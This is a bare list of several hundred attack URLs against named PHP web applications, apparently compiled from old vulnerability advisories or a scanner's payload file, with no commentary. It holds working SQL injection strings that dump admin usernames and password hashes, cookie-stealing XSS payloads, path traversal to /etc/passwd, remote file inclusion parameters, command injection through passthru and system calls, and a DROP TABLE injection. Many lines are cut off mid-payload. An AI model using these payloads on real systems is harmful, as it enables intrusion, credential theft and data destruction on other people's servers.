/Script/landsee.php?id=-9+union+select+1,2,3,concat(username,0x3a,sifre),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75+FROM+admin--
/?page=[XsS]&mode=search 
/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>
/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>
/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript
/index.php?page=-1%20union%20all%20select%201,2,3,4,user_name,h_password%20from%20users/*
/index.php?page=-1'+union+select+1,concat(user_name,0x3a,h_password),3,4,5,6,7,8,9,10,11+from+users+limit+0,1/* 
/parse.php?file="><img/src/onerror=alert(document.cookie)> http
/xrms/login.php?target="><script>alert(1);</script>
/xrms/activities/some.php?title="><script>alert(1);</script>
/xrms/companies/some.php?company_name="><script>alert(1);</script>
/xrms/contacts/some.php?last_name="><script>alert(1);</script>
/xrms/campaigns/some.php?campaign_title="><script>alert(1);</script>
/xrms/opportunities/some.php?opportunity_title="><script>alert(1);</script>
/xrms/cases/some.php?case_title="><script>alert(1);</script>
/xrms/files/some.php?file_id="><script>alert(1);</script>
/xrms/reports/custom/mileage.php?starting="><script>alert(1);</script> 
/login.php?message=[XSS] 
/path/search.php?title=[XSS]
/path/search.php?description=[XSS]
/path/search.php?author=[XSS]
/path/login.php?return=[XSS] 
/listings.php?browse=product&cid=-1+union+all+select+1,concat(version(),char(58),database(),char(58),user()),3,4,5,6,7,8-- 
/userlist.php?p=2<script>alert('meh');</script> 
/index.php?flag=../../../autoexec.bat%00
/index.php?inc=../../../autoexec.bat%00 
/job_seeker/applynow.php?jid=-99999+union+select+0,01,concat(username,0x3a,password),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from+admin-- 
/news.php?id=-1+union+all+select+1,concat(version(),0x3a,database(),0x3a,user()),null,null-- 
/smileys.php?page_id=<script>alert('xss')</script>
/search.php?q="<script>alert('xss')</script> 
/index.php?currentpath=[XSS]&sort=[XSS]&invert=[XSS]
/index.php?sort=[XSS]&invert=[XSS]&currentpath=[XSS]&search=[XSS] 
/news.php?pn_go=details&page=[XSS]&id=[XSS] 
/gallery/photo.php?id=48+and+1=2+union+select+1,version(),user(),database(),0x6461726b633064652052756c65732e2e2121,6-- 
/server_databases.php?pos=0&dbstats=0&sort_by="]) OR exec('cp $(pwd)"/config.inc.php" config.txt'); //&sort_order=desc&token=[valid token] 
/admin.php?"><script>alert(document.cookie)</script><" 
/admin.php?"><script>alert(document.cookie)</script><" 
/admin/backup/db 
/webshell4/login.php?err=[XSS]
/webshell4/login.php?login=[XSS]
/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20 
/thyme/modules/common_files/add_calendars.php?callback="/></SCRIPT></FORM><SCRIPT>alert(document.cookie)</SCRIPT><SCRIPT><FORM> 
/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events 
/fuzzylime/admin/usercheck.php"> <input type="hidden" name="log" value="in"> <input type="text" name="user"value='"><script>alert(1)</script>'> <input type=submit></form> 
/advanced_search_result.php?keywords=/>"<script>alert(15)</script>&x=1&y=1
/xtcommerce304/shopping_cart.php/XTCsid/15031988 
/BluePageCMS/?PHPSESSID=15031988 
/tienda.php?id=-1+union+select+concat(version(),0x3a,database(),0x3a,user())/* 
/achievo-1.3.2/dispatch.php?atknodetype= >"><script%20%0a%0d>a lert(document.cookie)%3B</script>&atkaction=adminpim&atklevel=-1&atkprevlevel =0&achievo=cgvuu4c9nv45ofdq8ntv1inm82 
/cat.php?CatID=-1+union+select+1,concat(aid,0x3a,pwd,0x3a,email),3,4+from+7addad_authors-- 
/admin.php/%3E%22%3E%3CScRiPt%3Ealert('Hadi-Kiamarsi')%3C/ScRiPt%3E 
/etemplate.php?id=-5+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users-- 
/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20f
/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc&page=2&item=5'SQL INJECTION
/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5
/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5 
/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http
/search_results.php?k= XSS_CODE 
/search.php
/stuffs.php?category= XSS_CODE
/search.php
/search.php?keyword= XSS_HACKING 
/path/wp-admin/wpmu-blogs.php?action=blogs&s=%27[XSS]
/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address=%27[XSS]
/[path]/index.php?date=&v=http
/actions.php?m=dload&fn=%3Ciframe/src=javascript
/actions.php?m=search&start=1 [POST data
/actions.php?m=sysinfo&tab=1'><img/src/onerror=with(new XMLHttpRequest()){open('GET','http
/index.php/Special/Main/keywordSearch?key="><iframe src="http
/index.php/Edit/Main/Home?cmd=show&revNum=65"><iframe src="http
/index.php/Special/Main/WhatLinksHere?to="><iframe src="http
/index.php/Special/Main/UserEdits?user="><iframe src="http
/index.php/"><iframe src="http
/[path]/index.php?page=[XSS] 
/ampjukedemo/index.php?what=performerid&start=0&count='20&special=-2/**/UNION/**/SELECT/**/1,concat(name,0x3A7C3A,password)/**/FROM/**/user/**/WHERE/**/id=1/*
/main.php?refer=d&d=../../../etc
/edit.php?file=../../../etc/passwd 
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]= 
/index.php?id=[SQL]&option=com_jeux&act=view&Itemid=2
/index.php?id=-1691+union+all+select+1,2,3,4,5,6,7,8,9,concat(username,char(58),password)KHG,11,12,13,14,15,16,17,18+from+jos_users--&option=com_jeux&act=view&Itemid=2
/index.php?content="><script>alert("test")</script> 
/productlist.php?categoryid=20&level=-4 union select concat(loginid,0x2f,password) from adminuser-- 
/index.php?>"><script>alert("XSS Vuln")</script>
/index.php?option=>"><script>alert("XSS Vuln")</script>
/index.php?option=com_poll&Itemid=>"><script>alert("XSS Vuln")</script>
/index.php?option=com_poll&task=view&id=>"><script>alert("XSS Vuln")</script>
/index.php?option=com_poll&Itemid=1&task=>"><script>alert("XSS Vuln")</script>
/index.php?option=com_poll&task=view&bid=>"><script>alert("XSS Vuln")</script>
/index.php?option=com_poll&Itemid=1&task=view&contact_id=>"><script>alert("XSS Vuln")</script>
/index.php?page=3+AND+1=2+UNION+SELECT+0,concat(email,0x3a,password),2,3,4,5+from+users+limit+1,1-- 
/user/login/?habari_username=>"><script>alert("XSS Vuln")</script> 
/admin/cms/images.php?orderby=[INJECTION POINT]
/path/admin/cms/nav.php?task=editrecord&nav_id=[INJECTION POINT] 
/modules.php?name=Sarkilar&op=showcontent&id=-1+union+select+null,null,pwd,email,user_uid,null,null,null,null+from+hebuname_authors-- 
/[path]/web/lib/xml/oai/ListRecords.php?lib_dir=[shell]
/[path]/web/lib/xml/oai/ListRecords.php?xml_dir=[shell] 
/api.php?action=logout&forward=http
/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/* 
/admin/postlister/index.php?liste=default%22%3E%3Cscript%3Ealert(1)%3C/script%3E 
/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E 
/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2); 
/index.php?pg=c0d3_xss 
/pmd_pdf.php?db=>"><script>alert('Hadi-Kiamarsi')</script>
/include/common.php?XOOPS_ROOT_PATH=shell 
/[path]/index.php?mod=2&nid=-268)%20UNION%20ALL%20SELECT%20version(),0,0,concat(username,0x3a,userpass),0,0,0,0,0,0,0,0,0%20FROM%20default_users
/[path]/index.php?mod=0&cpage=-114) UNION ALL SELECT 0,0,0,0,0,version()-- 
/mybb/moderation.php?action=removesubscriptions&ajax=1&url='%2Balert('XSS!')// http
/[p4th]/modules/banners/click.php?bid=-1' union+select+pass+from+bcoos_users+limit 1,0/* 
/public/code/cp_polls_results.php?poll_language=eng&poll_id=-0+union+select+0,1,2,version(),4,5,6-- 
/modules.php?name=League&file=index&op=team&tid=[XSS] 
/liga.php?id=1'UNION SELECT concat_ws(0x3a,version(),database(),user()),2,3,4,5/* 
/view.php?cid=-33%20UNION%20ALL%20SELECT%200,user(),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--&uid=0&new=0 
/search.php?q=<script>alert(document.cookie);</script>&Search=Search 
/kmitag/index.php?begin=10<script>alert(document.cookie);</script>&catid=3
/kmitag/search.php?searchtext=<script>alert(document.cookie);</script>&Search=Search 
/[SCRIPT_DIR]/index.php?plugins[file][id]=<script>alert(2008);</script> 
/links.php?op=viewlink&cid=5+and+1=2+union+select+concat(version(),0x3a,database(),0x3a,user())-- 
/sapientphoto/pages.php?pageId=6634+and+1=2+union+select+1,2,3,4,5,6,concat(version(),0x3a,database(),0x3a,user())-- 
/tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13-- 
/index.php?module=account&action=login%3Cscript%3Ealert(%27xss%27);%3C/script%3E 
/order.php?dhaction=check&submit_domain=Register&domain=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&ext1=on
/order.php?dhaction=add&d1=lalalalasss%22%3E%3Cscript%3Ealert(1)%3C/script%3E&x1=.com&r1=0&h1=1&addtocart1=on&n=3
/register.php?config_skin=../../../../etc/passwd%00 
/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--
/signinform.php?msg="><script>alert(document.cookie)</script> 
/admin/home.php 
/search.php?lang=1&sort=Ref&search_query='"></title><script>alert(1337)</script>><marquee><h1>XSS</h1></marquee>
/[patch]/bbs.track.php?id=<script>alert(/0/)</script></body></html>
/subcategory.php?intSubCategoryID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- 
/page.php?intPageID=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())-- 
/news.php?intPageID=-1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user())-- 
/signinform.php?msg=Hacked%20By%20Vahid%20Ezraeil%20At%20North% 
/dynamic.php?la=fa&sys=search&q=%00"'><ScRiPt%20%0a%0d>alert(422446847572)%3B</ScRiPt>&site=main&action=new
/[acid_path]/index.php?p=search&menu=[XSS] 
/cadena_paquetes_ext.php?HotelID=pouya_Server&PaqueteID=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>
/hotel.php?HotelID=<script>alert(1369)</script>
/pages/index.php?q=<script>alert(1369)</script>
/rjbike_new/product.php?category_id=>'><script>alert(19 49308870);</script>&subcategory_id=1
/rjbike_new/product.php?category_id=1&subcategory_id=>' ><script>alert(1949308870);</script>
/showcategory.php?cid=9&type=1&keyword=Pouya&radio=>"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt
/advertisers/signinform.php?msg=</title><ScRiPt%20%0a%0d>alert(455695710637)%3B</ScRiPt>&show_form=no
/gallery.php?type=2&keyword=111-222-1933email@address.tst&radio=>"><ScRiPt%20%0a%0d>alert(436145568828)%3B</ScRiPt>&cid=0
/lostpassword.php?msg=<ScRiPt%20%0a%0d>alert(434915558474)%3B</ScRiPt
/admin/adminhome.php?tmp=1&msg=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(477365890784)%3B</ScRiPt
/admin/index.php?msg=&lt;/textarea&gt;<ScRiPt%20%0a%0d>alert(476295881324)%3B</ScRiPt 
/[Path]/siteadmin/forgot.php?adname=SQL'"&fu=Submit
/[Path]/siteadmin/forgot.php
/[Path]/new_message.asp?topic_id=0&amp;message_id=0&amp;forum_id=&lt;meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'&gt;
/[Path]/showads.php?id=[SQL]
/[Path]/showads.php?id=<script>alert(1369)</script> 
/orkutclone/profile_social.php?id=[sql query] 
/profile_social.php?id=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(0000)%3B%3C/ScRiPt%3E 
/[Path]/index.php?album=%00'"><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&adminlogin=Pouya_Server
/[Path]/?>"'><ScRiPt>alert(1369)</ScRiPt> 
/?f%5Bemail%5D=test@mail.com&f%5Bpassword%5D=\"&section=user&action=login
/?section=<ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&action=login&t=Pouya
/index.php?section=<script>alert(1369)</script>&action=login 
/show.php?id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a3a,password),1,1,1,1,1,1/**/FROM/**/mysql.user 
/twiki/bin/view/Main/WebSearch?search=%25SEARCH%7Bdate%3D%22P%60pr+-%3F%60%22+search%3D%22xyzzy%22%7D%25&scope=all 
/prestashop_1.1.0.3/admin/login.php/%22%3Cscript%3Ealert(1)%3C/script%3E
/prestashop_1.1.0.3/order.php/%22%3Cscript%3Ealert(1)%3C/script%3E
/index.php/%22%3Cscript%3Ealert(1)%3C/script%3E
/shop/kontakt.php/&#039;<script>alert(1)</script>
/Audit/Commerce/HackMe/shop/Admin/shop_kunden_mgmt.php/%22%3Cscript%3Ealert(1)%3C/script%3E
/Audit/Commerce/HackMe/shop/Admin/SHOP_KONFIGURATION.php/"<script>alert(1)</script>
/upload/feeds.php?name=articles&id=<SQL>
/path/phpcksec.php?path=>\'><ScRiPt >alert(0);</ScRiPt>
/index.php?p=%28SQL%29 
/joke.php?id=-1992+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8+from+admin_login-- 
/manuals_search.php?manuals_search=<html><script>window.location="http
/www.example.com/npds/modules/annonces/config.php?admin=1&tit=";%0Apassthru(stripslashes(urldecode($_GET[&#039;cmd&#039;])));%0Aecho%20"
/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../test.php%00&lastfm_username=";%0Asystem($_GET[&#039;dir&#039;]);%0Aecho%20"
/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../index.html%00&lastfm_username=";%0APHP?><html><big><big>OWNED%20BY%20NOSP
/www.example.com/npds/modules/upload/upload.php">Fichier 
/www.example.com/npds/footer.php?Default_Theme=../logs\security.log%00
/www.example.com/npds/modules/annonces/affi_ann.php?ModPath=../../logs/security.log%00
/www.example.com/npds/modules/annonces/affi_img.php?ModPath=../../logs/security.log%00
/www.example.com/npds/modules/affiche.php?ModPath=../../logs/security.log%00
/www.example.com/npds/modules/annul.php?ModPath=../../logs/security.log%00&
/www.example.com//npds/modules/block_partenaires.php?language=../../../../../../logs/security.log%00
/www.example.com/npds/modules/chargement.php?ModPath=../../logs/security.log%00
/www.example.com/npds/modules/deezer/admin/index.php?ModPath=../../../../logs/security.log%00 OU
/www.example.com/npds/modules/deezer/admin/index.php?language=../../../../../../logs/security.log%00
/www.example.com/npds/modules/deezer/deezer.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/deezer/deezermod.php?language=../../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../../../logs/security.log%00
/www.example.com/npds/modules/GS-annonces/print.php?ModPath=../../../logs/security.log%00
/www.example.com/npds/modules/last-fm/admin/adm.php?ModPath=../../../../logs/security.log%00 OU
/www.example.com/npds/modules/last-fm/admin/adm.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/last-fm/admin/adm_save.php?ModPath=../../../../../logs/security.log%00
/www.example.com/npds/modules/last-fm/error.php?ModPath=../../../../logs/security.log%00 ET
/www.example.com/npds/modules/last-fm/error.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/last-fm/last-fm.php?language=../../../../../../logs/security.log%00
/www.example.com/npds/modules/links/admin/create_tables.php?ModPath=../../../../logs/security.log%00/admin%00
/www.example.com/npds/modules/saisie.php?user=1&ModPath=../../logs/security.log%00
/www.example.com/npds/modules/td-galerie/admin/adm.php?ModPath=../../../.././logs/security.log%00
/www.example.com/npds/modules/td-glossaire/glossadmin.php?ModPath=../../../logs/security.log%00 OU
/www.example.com/npds/modules/td-glossaire/glossadmin.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/td-glossaire/glossaire.php?ModPath=../../../logs/security.log%00 OU
/www.example.com/npds/modules/td-glossaire/glossaire.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/td-livredor/admin/livradmin.php?language=../../../../../../../logs/security.log%00
/www.example.com/npds/modules/td-livredor/envoi.php?ModPath=../../../logs/security.log%00OUhttp
/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp
/www.example.com/npds/modules/td-livredor/error.php?ModPath=../../../logs/security.log%00OUhttp
/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../../logs/security.log%00
/www.example.com/npds/modules/td-livredor/livre.php?language=../../../../logs/security.log%00
/www.example.com/npds/modules/TvGuide/index.php?ModPath=../../../logs/security.log%00
/www.example.com/npds/modules/TvGuide/index.php?language=../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/modif_ann.php?ModPath=../../../index.php%00&op=modifier&HTTP_POST_VARS[code]=60000&id=1&table_annonces=annonces&
/www.example.com/npds/friend.php?op=SendSite&yname=bill%20gates%20<ex_pdg@microsoft.com>%0ATo
/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&ble_annonces=`users`/*
/www.example.com/npds/modules/G-annonces/list_ann.php?ModPath=../../../index.php%00&table_annonces=annonces%20UNION%20SELECT%200,0,0,CONCAT(aid,char(58),
/www.example.com/npds/modules/G-annonces/search.php?ModPath=../../../index.php%00&HTTP_POST_VARS[action]=ajouter&table_annonces=annonces%20UNION%20SELECT
/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=annonces_cat%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(
/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=faqcategories%20UNION%20SELECT%20CONCAT(aid,char(5
/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../mainfile.php%00&id_user=1&table_annonces=annonces%20UNION%20SELECT%20CONCA
/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../../../npds/index.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[tabl
/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../mainfile.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[table_cat]=fa
/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../npds/index.php%00&table_cat=`test_hack_npds`%20(%20id_cat%20mediumint(11)%20NOT
/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00
/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?mess_acc=%3Cscript>alert("test");%3C/script>
/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?mess_acc=%3Cscript>alert("test");%3C/script>
/www.example.com/npds/modules/G-annonces/annonce_form.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/www.example.com/npds/modules/G-annonces/index.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/www.example.com/npds/modules/G-annonces/list_ann.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/www.example.com/npds/modules/G-annonces/modif_ann.php?mess_acc=%3Cscript>alert(&#039;test&#039;);%3C/script>
/www.example.com/npds/modules/G-annonces/search.php?mess_acc=%3Cscript>alert(&#039;test&#039;);</script>
/www.example.com/npds/modules/G-annonces/admin/index.php?mess_acc=%3Cscript>alert("test");%3C/script>
/www.example.com/npds/modules/Top10/top10.php?bgcolor2=green"><script>alert(&#039;test&#039;);</script>
/www.example.com/npds/themes/npds2004/footer.php?theme="><script>alert(&#039;test&#039;);</script>
/main.php?id_area=[SQL] 
/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/* 
/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7 
/index.php?tg=search&pat=%22%3E%3Cscript%20src=http
/index.php?tg=oml&file=download.html&smap_node_id==%22%3E%3Cscript%20src=http
/?Culture=fa-IR&page=search&SearchKeywords=[SQL] 
/[Path]/index.php?seite=20%2Egaestebuch&action=[SQL]&id=1 
/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+a
/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+p
/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+u
/[path]/modules.php?name=Downloads&d_op=Add&title=1&description=1&email=attacker@devil.net&&url=0%2F*%00*/'%20OR%20ascii(substring((select+u
/conpresso407/_manual/index.php?ref=http
/www/delivery/fc.php?MAX_type= ../../../../../../../../../../../../../../../etc/passwd%00 
/cs.html?url=http
/b2b/signin.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E
/b2b/gen_confirm.php?errmsg=%3Cscript%3Ealert(1);%3C/script%3E 
/metabbs/admin/settings/?"> <dl> <dt><label for="settings_admin_password">Admin password</label></dt> <dd><input id="settings_admin_password" size="20" name="settings[admin_password]" value="" type="password" /></dd> <dt><label for="settings_global_header">Header file</label></dt> <dd><input id="settings_global_header" size="30" name="settings[global_header]" value="" type="text" /></dd> <dt><label for="settings_global_footer">Footer File</label></dt> <dd><input id="settings_global_footer" size="30" name="settings[global_footer]" value="" type="text" /></dd> <dt><label for="settings_theme">Site theme</label></dt> <dd><input id="settings_theme" size="30" name="settings[theme]" value="" type="text" /></dd> <dt><label for="settings_default_language">Language</label></dt> <dd> <dd><input id="ettings_default_language" size="30" name="settings[default_language]" value="" type="text" /></dd> <input name="settings[always_use_default_language]" value="0" type="hidden" /><input id="settings_always_use_default_language" name="settings[always_use_default_language]" value="1" type="checkbox" /> <label for="settings_always_use_default_language">Always Use Default Language</label> </dd> <dt><label for="settings_timezone">TimeZone</label></dt> <dd> <dd><input id="settings_timezone" size="30" name="settings[timezone]" value="" type="text" /></dd> </dl> <h2>Advanced Setting</h2> <p><input name="settings[force_fancy_url]" value="0" type="hidden" /> <input id="settings_force_fancy_url" name="settings[force_fancy_url]" value="1" type="checkbox" /> <label for="settings_force_fancy_url">Fancy URL Force Apply</label></p> <p><input type="submit" value="OK" /></p> </form> 
/fotoweb/cmdrequest/Login.fwx?s="><script>alert(â??0wn3dâ?)</script>
/fotoweb/Grid.fwx?&search=<script>alert("0wn3d�)</script> and (FQYFT
/bitrix/help/en/index.html?page=javascript
/dwnld.php?file=../../../../etc/passwd 
/[path]/admin/index.php?eventid=-1+union+all+select+1,concat_ws(version(),0x3a,database(),0x3a,user()),3,4,5,6-- 
/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code] 
/index.php?page=../../../../../../../../../../../../../../.. /../../../../../../../../../etc/passwd%00 
/path/index.php?option=com_gigcal&task=details&gigcal_bands_id=-1'
/index.php/admin/
/index.php/admin/index/forgotpassword/
/downloader/?return=%22%3Cscript%3Ealert('xss')%3C/script%3E 
/news.php?nid=-1+union+select+1,2,3,4,5,concat(sm_username,char(58),sm_password),7,8,9+from+tbl_site_member 
/[p4th]/index.php?Cat=-9999'+union+select+1,2,3,concat(user_username,char(58),user_password),5,6,7,8,9,10,11,12,13,14,15,16+from+parsiphp_u
/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]
/path/css/includer.php?files=PATH_TO_FILES 
/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa
/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script>
/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script>
/index.php?page=search&search=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&author_id=&author=&startdate=&enddate=&pf=1&topic=
/[Path]/modir
/cmscart/index.php?MenuLevel1=%27 
/market/[content_dir]/?fields_filter[price][0]=%22%3E%3Cscript%3Ealert(&#039;XSS&#039;)%3C/script%3E&fields_filter[price][1]=1
/system/rss.php?id=1'SQL-code 
/tiki-galleries.php/>"><Script>alert(1)</scRipt> 
/tiki-list_file_gallery.php/>"><Script>alert(2)</scRipt> 
/tiki-listpages.php/>"><Script>alert(3)</scRipt> 
/?notepad_body=%2527,%20is_moderator%20=%201,%20is_administrator%20=%201,%20is_superadministrator%20=%201%20WHERE%20username%20=%20%2527bookoo%2527/* 
/ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23 
/comparisonengine/product.comparision.php?cat=null union all select 1,concat_ws(0x3a,id,email,password,nickname),3,4,5 from daype_users_tb--&name=GSM 
/index.php?cmd=search&keywords="><script>alert('XSS')</script>
/index.php?cmd=search&keywords=<META HTTP-EQUIV="refresh" content="0; URL=http
/myapp/index.php?oscid=arbitrarysession 
/frontend/article.php?aid=-9999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
/frontend/articles.php?cid=-999+union+all+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10+from+users--
/frontend/index.php?chlang=../../../../etc/services%00 
/linpha-1.3.2/login.php?ref=&#039;><script>alert(1)</ScRiPt>
/test/linpha-1.3.2/new_images.php?order=%22%3Cscript%3Ealert(1)%3C/script%3E
/test/linpha-1.3.2/new_images.php?pn=%22%3Cscript%3Ealert(1)%3C/script%3E
/phorum-5.2.10/admin.php?module=badwords&curr=1"><img/src/onerror="
/phorum-5.2.10/admin.php?module=banlist&curr=1"><img/src/onerror="alert('voodoo');&delete=1
/cms/admin/?action=edit&slab=home&#039;><script>alert(&#039;http
/cms/admin/?action=showcats&unpub=true&slabID=1&catname=sidebar&#039;><script>alert(&#039;http
/cms/admin/?action=reordercat&cat=sidebar&#039;><script>alert(&#039;http
/path/admin.php?module=../../../../../etc/passwd 
/index.php?section=<script>alert(123)</script> 
/index.php?showGroup=+<script>alert(123)</script>
/view.php?id=+<script>alert(123)</script>
/email.php?id=+<script>alert(123)</script>
/edit.php?id=+<script>alert(123)</script>
/delete.php?id=+<script>alert(123)</script> 
/path/index.php?ip=||whoami 
/[path]/input.php?nickname=[XSS]&color=[XSS] 
/index.php?app=core&module=ajax&section=register&do=check-display-name&name[]= 
/docs/showdoc.php?css=1>"><ScRiPt%20%0a%0d>alert(123)%3B</ScRiPt> 
/somefile.png?"><script>alert('xss')</script> 
/link>
/pentest</link>
/index.php?page=login&nick="><script>alert("Vulnerable");</script>
/index.php?page=login&nick="><iframe src=
/index.html?news></iframe> 
/referer/?"><script>alert(123)</script><a%20href=" 
/magpierss-0.72/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert(%27xss%27);%3C/script http
/Dacio_imgGal-v1.6/index.php?gallery=../config.inc%00 
